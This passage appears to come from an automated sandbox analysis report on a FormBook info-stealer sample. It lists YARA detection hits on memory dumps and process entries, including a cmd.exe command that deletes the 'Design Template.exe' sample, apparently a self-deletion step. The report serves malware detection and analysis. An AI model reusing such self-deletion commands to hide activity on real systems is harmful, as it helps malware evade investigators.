                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              Reputation:high

                                                                              General

                                                                              Start time:14:42:11
                                                                              Start date:12/04/2021
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:/c del 'C:\Users\user\Desktop\Design Template.exe'
                                                                              Imagebase:0x970000
                                                                              File size:232960 bytes
                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Start time:14:42:12
                                                                              Start date:12/04/2021
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff774ee0000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Disassembly

                                                                              Code Analysis

                                                                              Reset < >